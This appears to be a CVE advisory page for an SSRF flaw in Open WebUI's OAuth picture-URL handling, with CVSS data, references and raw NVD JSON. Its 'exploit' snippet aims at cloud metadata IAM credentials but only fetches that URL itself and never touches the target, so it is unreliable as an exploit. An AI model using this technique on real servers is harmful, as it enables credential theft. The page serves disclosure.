CVE-2026-45338

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, a Server-Side Request Forgery (SSRF) vulnerability exists in _process_picture_url() in backend/open_webui/utils/oauth.py (line ~1338). The function fetches arbitrary URLs from OAuth picture claims without applying validate_url(), allowing an attacker to force the server to make HTTP requests to internal resources and exfiltrate the full response. This vulnerability is fixed in 0.9.0.

CVSS Details

CVSS Score

7.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Open WebUI instance)
# The vulnerability is triggered during OAuth processing where the 'picture' URL is fetched.
target_host = "http://localhost:3000"
malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name"

# Conceptual PoC simulating the vulnerable function call
# In a real scenario, this would be part of the OAuth response payload.
payload_data = {
    "user_info": {
        "picture": malicious_url  # Injection point
    }
}

print(f"[+] Attempting to trigger SSRF against: {malicious_url}")

# This simulates the server-side request made by the vulnerable function
try:
    response = requests.get(malicious_url, timeout=5)
    print(f"[+] Response Status: {response.status_code}")
    print("[+] Exfiltrated Content:")
    print(response.text)
except Exception as e:
    print(f"[-] Request failed: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-45338
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-45338
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-45338/
[4] VulDB https://vuldb.com/cve/CVE-2026-45338
[5] https://github.com/open-webui/open-webui/security/advisories/GHSA-24c9-2m8q-qhmh
[6] https://github.com/open-webui/open-webui/security/advisories/GHSA-24c9-2m8q-qhmh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-45338", "sourceIdentifier": "[email protected]", "published": "2026-05-15T22:16:54.790", "lastModified": "2026-05-15T23:16:21.180", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, a Server-Side Request Forgery (SSRF) vulnerability exists in _process_picture_url() in backend/open_webui/utils/oauth.py (line ~1338). The function fetches arbitrary URLs from OAuth picture claims without applying validate_url(), allowing an attacker to force the server to make HTTP requests to internal resources and exfiltrate the full response. This vulnerability is fixed in 0.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-24c9-2m8q-qhmh", "source": "[email protected]"}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-24c9-2m8q-qhmh", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}